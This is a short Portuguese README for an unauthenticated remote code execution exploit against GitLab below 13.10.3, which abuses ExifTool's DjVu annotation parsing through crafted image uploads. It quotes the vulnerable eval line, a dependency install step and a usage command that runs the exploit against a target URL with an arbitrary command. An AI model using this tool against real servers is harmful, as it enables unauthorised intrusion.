
Exploit de execução remota de código não autenticado para versões do GitLab < 13.10.3, aproveitando a análise de anotações DjVu do ExifTool para executar comandos arbitrários através de uploads de imagem manipulados.
Exploit de RCE não autenticado para gitlab versão < 13.10.3
Apenas para fins educacionais/de pesquisa. Use por sua conta e risco
Causa raiz:
# convert C escape sequences (allowed in quoted text)
$tok = eval qq{"$tok"};
É necessário instalar djvumake e djvulibre para funcionar
Instale o djvulibre (caso ainda não o tenha instalado)
sudo apt-get install -y djvulibre-bin
Execute o exploit
python3 exploit.py -t <gitlab_url> -c <command>
Testado na versão 13.10.1-ce.0